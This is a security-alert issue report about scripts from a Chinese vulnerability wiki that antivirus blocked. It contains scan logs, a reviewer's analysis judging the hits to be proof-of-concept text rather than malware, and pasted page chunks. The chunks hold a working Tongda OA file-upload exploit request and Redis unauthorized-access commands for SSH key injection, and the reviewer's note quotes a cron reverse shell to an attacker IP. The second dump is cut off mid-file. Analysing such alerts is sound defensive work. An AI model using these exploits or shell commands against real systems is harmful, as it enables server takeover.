【安全告警】issue #2635 推荐资源页面中的链接包含恶意攻击载荷
issue #2635 推荐资源页面中的链接“PeiQi文库”包含恶意攻击载荷: http://wiki.peiqi.tech/assets/js/9.2369a4c5.js http://wiki.peiqi.tech/assets/js/113.e7ee5e11.js http://wiki.peiqi.tech/assets/js/408.6bd2b286.js (复核说明:就下文贴出的 113.e7ee5e11.js 和 9.2369a4c5.js 的内容看,两者都是该站点的 webpack 页面分块,被标记的 PHP webshell / 反弹 shell 字符串是漏洞复现文章里的 PoC 文本,以文本节点形式渲染;脚本本身不含 eval、动态脚本加载或外联请求,告警更可能是对 PoC 文本的特征匹配而非可执行的恶意载荷。不过该站点通过明文 HTTP 分发脚本,中间人可以替换内容,这一判断只对当时抓取到的文件有效,复核时应比对实际下载文件的哈希;408.6bd2b286.js 未贴出,无法据此判断。)
火绒安全日志如下(三条告警的操作进程均为 Chrome 的 NetworkService 工具进程,即文件在下载阶段就被 WEB 扫描拦截,并未进入渲染进程执行;对应页面内容因此不会被渲染):
【3】2022-09-25 21:41:23,病毒防护,WEB扫描,发现病毒TrojanDownloader/PS.NetLoader.aw, 已阻止
病毒名称:TrojanDownloader/PS.NetLoader.aw
病毒ID:53F2750F99F235F6
病毒URL:http://wiki.peiqi.tech/assets/js/9.2369a4c5.js
操作结果:已阻止
进程ID:18156
操作进程:C:\Program Files\Google\Chrome\Application\chrome.exe
操作进程命令行:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2196,i,3598864850642461159,7124751335540957748,131072 /prefetch:8
操作进程校验和:9037711d20353f0adec0c4558a77f6277dab778b
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【4】2022-09-25 21:41:05,病毒防护,WEB扫描,发现病毒HEUR:Backdoor/PHP.WebShell.d, 已阻止
病毒名称:HEUR:Backdoor/PHP.WebShell.d
病毒ID:38B63BB3B1F6D704
病毒URL:http://wiki.peiqi.tech/assets/js/408.6bd2b286.js
操作结果:已阻止
进程ID:18156
操作进程:C:\Program Files\Google\Chrome\Application\chrome.exe
操作进程命令行:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2196,i,3598864850642461159,7124751335540957748,131072 /prefetch:8
操作进程校验和:9037711d20353f0adec0c4558a77f6277dab778b
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【5】2022-09-25 21:40:34,病毒防护,WEB扫描,发现病毒HEUR:Backdoor/PHP.WebShell.a, 已阻止
病毒名称:HEUR:Backdoor/PHP.WebShell.a
病毒ID:ED9F80E4A8E762B9
病毒URL:http://wiki.peiqi.tech/assets/js/113.e7ee5e11.js
操作结果:已阻止
进程ID:18156
操作进程:C:\Program Files\Google\Chrome\Application\chrome.exe
操作进程命令行:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2196,i,3598864850642461159,7124751335540957748,131072 /prefetch:8
操作进程校验和:9037711d20353f0adec0c4558a77f6277dab778b
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
http://wiki.peiqi.tech/assets/js/113.e7ee5e11.js 内容如下(这是站点《通达OA v11.8 api.ali.php 任意文件上传漏洞》一文对应的 webpack 页面分块:模块 1737–1740 只导出图片路径,模块 2828 是渲染函数,文中的 `<?php phpinfo();?>`、`eval(base64_decode(...))` 等均作为 `t._v(...)` 文本节点输出,不会在浏览器中执行,HEUR:Backdoor/PHP.WebShell.a 很可能是对这些 PoC 文本的特征命中。原文件为单行,下面的换行落在字符串字面量内部,是页面折行造成的):
// Webpack JSONP chunk 113 of a statically generated Vue 2 site (VuePress-style:
// `$createElement`, `_self._c`, `_v`, `ContentSlotsDistributor`, `staticClass`).
// Registers five modules in one `push` call:
//   1737–1740 — each exports `s.p + "assets/img/….png"`, i.e. a public-path-prefixed image URL.
//   2828      — the page component for the article "通达OA v11.8 api.ali.php 任意文件上传漏洞".
//               `s.r(a)` / `s(75)` are webpack runtime helpers (presumably the ES-module flag and the
//               Vue component normalizer — not visible here). The render function builds the page
//               from h1/h2/p/pre/code/span/img/a-checkbox nodes via `r(tag, data, children)`; every
//               piece of article text is passed through `t._v(...)`, which creates text VNodes only.
// Security review: the PHP webshell fragments (`file_put_contents('../../fb6790f4.php','<?php phpinfo();?>');`,
// `eval(base64_decode($BackData[a]))`) and the multipart PoC request exist solely as string literals
// rendered as text. The chunk contains no eval / new Function, no dynamic <script> insertion, no
// fetch/XHR, and no URL other than the relative `assets/img/…` paths and `#anchor` hrefs. The
// Huorong "HEUR:Backdoor/PHP.WebShell.a" verdict on this URL is therefore most plausibly a
// content-signature match on the PoC text rather than executable malicious JavaScript.
// NOTE(review): the line breaks below fall inside string literals (`"token ` / `punctuation"`) — they
// are display wrapping of a single-line minified file, not part of the original. The file is served
// over plain HTTP, so this assessment applies only to the copy reviewed here; compare the hash of
// any newly fetched copy before relying on it.
(window.webpackJsonp=window.webpackJsonp||[]).push([[113],{1737:function(t,a,s){t.exports=s.p+"assets/img/1628303888717-4ffc91a6-e87e-4e00-8bd5-b2218bb0772a.70c7bdb3.png"},1738:function(t,a,s){t.exports=s.p+"assets/img/1630513004438-e5a73ef6-8d65-40a1-9a3c-3be30cd7d164.da74a076.png"},1739:function(t,a,s){t.exports=s.p+"assets/img/1630513044174-8139c404-4f11-404e-be04-42d86b407bdd.420a6145.png"},1740:function(t,a,s){t.exports=s.p+"assets/img/1630513283771-36cc86c7-a150-4834-be64-243b20938165.83dcea54.png"},2828:function(t,a,s){"use strict";s.r(a);var r=s(75),n=Object(r.a)({},(function(){var t=this,a=t.$createElement,r=t._self._c||a;return r("ContentSlotsDistributor",{attrs:{"slot-key":t.$parent.slotKey}},[r("h1",{attrs:{id:"通达oa-v11-8-api-ali-php-任意文件上传漏洞"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#通达oa-v11-8-api-ali-php-任意文件上传漏洞"}},[t._v("#")]),t._v(" 通达OA v11.8 api.ali.php 任意文件上传漏洞")]),t._v(" "),r("h2",{attrs:{id:"漏洞描述"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#漏洞描述"}},[t._v("#")]),t._v(" 漏洞描述")]),t._v(" "),r("p",[t._v("通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器")]),t._v(" "),r("h2",{attrs:{id:"漏洞影响"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#漏洞影响"}},[t._v("#")]),t._v(" 漏洞影响")]),t._v(" "),r("a-checkbox",{attrs:{checked:""}},[t._v("通达OA v11.8")]),r("br"),t._v(" "),r("h2",{attrs:{id:"漏洞复现"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#漏洞复现"}},[t._v("#")]),t._v(" 漏洞复现")]),t._v(" "),r("p",[t._v("登陆页面")]),t._v(" "),r("p",[r("img",{attrs:{src:s(1737),alt:"img"}})]),t._v(" "),r("p",[t._v("像 api.ali.php 发送请求包")]),t._v(" "),r("div",{staticClass:"language-python line-numbers-mode"},[r("pre",{pre:!0,attrs:{class:"language-python"}},[r("code",[t._v("POST "),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("mobile"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("api"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("api"),r("span",{pre:!0,attrs:{class:"token 
punctuation"}},[t._v(".")]),t._v("ali"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("php HTTP"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("1.1")]),t._v("\nHost"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" \nUser"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Agent"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" Go"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("http"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("client"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("1.1")]),t._v("\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Length"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" "),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("422")]),t._v("\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Type"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" multipart"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("form"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("data"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(";")]),t._v(" boundary"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),t._v("502f67681799b07e4de6b503655f5cae\nAccept"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Encoding"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" gzip\n\n"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("502f67681799b07e4de6b503655f5cae\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Disposition"),r("span",{pre:!0,attrs:{class:"token 
punctuation"}},[t._v(":")]),t._v(" form"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("data"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(";")]),t._v(" name"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"file"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(";")]),t._v(" filename"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"fb6790f4.json"')]),t._v("\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Type"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" application"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("octet"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("stream\n\n"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v("{")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"modular"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"AllVariable"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(",")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"a"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw=="')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(",")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"dataAnalysis"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"{\\"a\\":\\"錦\',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/*\\"}"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v("}")]),t._v("\n"),r("span",{pre:!0,attrs:{class:"token 
operator"}},[t._v("-")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("502f67681799b07e4de6b503655f5cae"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("\n")])]),t._v(" "),r("div",{staticClass:"line-numbers-wrapper"},[r("span",{staticClass:"line-number"},[t._v("1")]),r("br"),r("span",{staticClass:"line-number"},[t._v("2")]),r("br"),r("span",{staticClass:"line-number"},[t._v("3")]),r("br"),r("span",{staticClass:"line-number"},[t._v("4")]),r("br"),r("span",{staticClass:"line-number"},[t._v("5")]),r("br"),r("span",{staticClass:"line-number"},[t._v("6")]),r("br"),r("span",{staticClass:"line-number"},[t._v("7")]),r("br"),r("span",{staticClass:"line-number"},[t._v("8")]),r("br"),r("span",{staticClass:"line-number"},[t._v("9")]),r("br"),r("span",{staticClass:"line-number"},[t._v("10")]),r("br"),r("span",{staticClass:"line-number"},[t._v("11")]),r("br"),r("span",{staticClass:"line-number"},[t._v("12")]),r("br"),r("span",{staticClass:"line-number"},[t._v("13")]),r("br")])]),r("a-checkbox",{attrs:{checked:""}},[t._v("参数a base解码")]),r("br"),t._v(" "),r("a-checkbox",{attrs:{checked:""}},[t._v("ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==file_put_contents('../../fb6790f4.php','<?php phpinfo();?>');")]),r("br"),t._v(" "),r("p",[r("img",{attrs:{src:s(1738),alt:"img"}})]),t._v(" "),r("p",[t._v("再发送GET请求写入文件")]),t._v(" "),r("div",{staticClass:"language-python line-numbers-mode"},[r("pre",{pre:!0,attrs:{class:"language-python"}},[r("code",[r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("inc"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("package"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("work"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("php?"),r("span",{pre:!0,attrs:{class:"token builtin"}},[t._v("id")]),r("span",{pre:!0,attrs:{class:"token 
operator"}},[t._v("=")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("myoa"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("attach"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("approve_center"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("2109")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token 
operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("fb6790f4\n")])]),t._v(" "),r("div",{staticClass:"line-numbers-wrapper"},[r("span",{staticClass:"line-number"},[t._v("1")]),r("br")])]),r("p",[r("img",{attrs:{src:s(1739),alt:"img"}})]),t._v(" "),r("p",[t._v("其中请求中对 2109 为 年月,路径为 "),r("code",[t._v("/fb6790f4.php,")])]),t._v(" "),r("p",[r("img",{attrs:{src:s(1740),alt:"img"}})])],1)}),[],!1,null,null,null);a.default=n.exports}}]);
http://wiki.peiqi.tech/assets/js/9.2369a4c5.js 内容如下(这是《Redis 6379端口》一文对应的页面分块,结构与上一个文件相同:模块 1024–1039 导出图片路径,模块 2586 是渲染函数。文中的 `config set dir /var/www/html` + `<?php phpinfo();?>` 写 webshell、`*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.0.140/9999 0>&1` 定时任务反弹 shell 等都是 `s._v(...)` 文本节点,外链(zeronights PDF、redis-rogue-server)为普通 `href` 且带 `rel="noopener noreferrer"`。火绒对该文件报的是 TrojanDownloader/PS.NetLoader.aw,而所贴内容中并无 PowerShell 片段,命中依据无法从这里确认;另外下面的内容在 redis-rogue-server 的 banner 处被截断,并非完整文件):
(window.webpackJsonp=window.webpackJsonp||[]).push([[9],{1024:function(s,t,a){s.exports=a.p+"assets/img/1628511265889-a89c273a-fa98-458c-b7d0-8a61b9098cc2-20220415143203556.794335ca.png"},1025:function(s,t,a){s.exports=a.p+"assets/img/1628511872365-61010be1-642a-4a70-8390-1de94a771e5b-20220415143203424.c66d4dbb.png"},1026:function(s,t,a){s.exports=a.p+"assets/img/1628511715038-57addcaa-bed5-4db8-a030-acafc228ba79-20220415143203457.eef9b57a.png"},1027:function(s,t,a){s.exports=a.p+"assets/img/1628512967608-9d62672c-9db3-4b07-94ad-70d03edf02b7-20220415143203434.9897afb6.png"},1028:function(s,t,a){s.exports=a.p+"assets/img/1628513275098-e5bcd6c4-3c19-4aaa-b2c1-90bd3d3b4a4e-20220415143203451.151e7ac3.png"},1029:function(s,t,a){s.exports=a.p+"assets/img/1628514409894-848f4f59-3b45-449a-8566-c204aed32354-20220415143203297.fba85c78.png"},1030:function(s,t,a){s.exports=a.p+"assets/img/1628515307073-5d1f3553-587e-476a-9556-beb3c9eb54bf-20220415143203556.3c3cade0.png"},1031:function(s,t,a){s.exports=a.p+"assets/img/1628515979062-1d027d69-3100-4eb9-9496-43b0b15a7768-20220415143203717.9a8e8d57.png"},1032:function(s,t,a){s.exports=a.p+"assets/img/1628603729549-61622428-de4c-4dbf-abdb-7ceb5c0d6240-20220415143203493.808174aa.png"},1033:function(s,t,a){s.exports=a.p+"assets/img/1628608226504-a9981cc4-1dae-4c85-9468-39bd3f030305-20220415143203642.bd3538c3.png"},1034:function(s,t,a){s.exports=a.p+"assets/img/1628608233667-192fed23-55a2-43a8-88df-75cc7d9d0b9b-20220415143203584.357b75de.png"},1035:function(s,t,a){s.exports=a.p+"assets/img/1628609553023-5e320f71-cea1-4ade-ad72-f1e0f51f7f11-20220415143203567.5bb58bce.png"},1036:function(s,t,a){s.exports=a.p+"assets/img/1628609873998-b83c9a14-4307-45fb-8c50-f46b79d85f86-20220415143203676.f3e64db5.png"},1037:function(s,t,a){s.exports=a.p+"assets/img/1628609802263-2105839f-6645-428b-82d4-bbb75b3dadb9-20220415143203681.8b806788.png"},1038:function(s,t,a){s.exports=a.p+"assets/img/1628610432546-2e313488-1ab1-42f2-bf37-fb074693c30a-20220415151
326919.eba8b536.png"},1039:function(s,t,a){s.exports=a.p+"assets/img/1628682645780-adbda105-6e56-481d-a4c9-b34e6bd5908b-20220415143203710.60230d0b.png"},2586:function(s,t,a){"use strict";a.r(t);var e=a(75),r=Object(e.a)({},(function(){var s=this,t=s.$createElement,e=s._self._c||t;return e("ContentSlotsDistributor",{attrs:{"slot-key":s.$parent.slotKey}},[e("h1",{attrs:{id:"redis-6379端口"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#redis-6379端口"}},[s._v("#")]),s._v(" Redis 6379端口")]),s._v(" "),e("h2",{attrs:{id:"关于"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#关于"}},[s._v("#")]),s._v(" 关于")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器")]),e("br"),s._v(" "),e("h2",{attrs:{id:"攻击方法"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#攻击方法"}},[s._v("#")]),s._v(" 攻击方法")]),s._v(" "),e("p",[s._v("要成功的利用Redis未授权访问的漏洞需要如下几点")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("redis服务以root账户运行")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("redis无密码或弱密码进行认证")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("redis监听在0.0.0.0公网上或内网中")]),e("br"),s._v(" "),e("p",[s._v("首先可以使用 Nmap的检测脚本 对 Redis进行未授权检测")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("nmap "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("A")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("p "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),s._v(" –script redis"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("info 
"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[s._v("也可以使用其他工具进行扫描")]),s._v(" "),e("p",[e("img",{attrs:{src:a(1024),alt:"img"}})]),s._v(" "),e("p",[s._v("连接数据库查看 info, 确定未授权访问")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("redis"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("cli "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("h "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("p "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1025),alt:"img"}})]),s._v(" "),e("p",[e("img",{attrs:{src:a(1026),alt:"img"}})]),s._v(" "),e("h2",{attrs:{id:"linux-获取权限"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#linux-获取权限"}},[s._v("#")]),s._v(" Linux 获取权限")]),s._v(" "),e("h3",{attrs:{id:"ssh公钥"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#ssh公钥"}},[s._v("#")]),s._v(" SSH公钥")]),s._v(" "),e("p",[s._v("生成密钥在攻击机中")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("ssh"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("keygen "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("t rsa\n")])]),s._v(" 
"),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1027),alt:"img"}})]),s._v(" "),e("p",[s._v("将公钥导入key.txt文件(前后用\\n\\n换行,避免和Redis里其他缓存数据混合)")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("echo")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("e "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\\n\\n"')]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(";")]),s._v(" cat id_rsa"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("pub"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(";")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("echo")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("e "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\\n\\n"')]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" key"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("txt\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1028),alt:"img"}})]),s._v(" "),e("p",[s._v("再把 key.txt 文件内容写入目标主机的缓冲里")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("cat key"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),e("span",{pre:!0,attrs:{class:"token class-name"}},[s._v("txt")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token 
class-name"}},[s._v("redis")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("cli "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("h "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("x set test \n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1029),alt:"img"}}),s._v("\n再通过设置参数,写入指定文件")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("┌──"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s._v("root💀kali"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("[")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("~")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("ssh"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),s._v("\n└─"),e("span",{pre:!0,attrs:{class:"token comment"}},[s._v("# redis-cli -h 192.168.0.126 -p 6379")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token 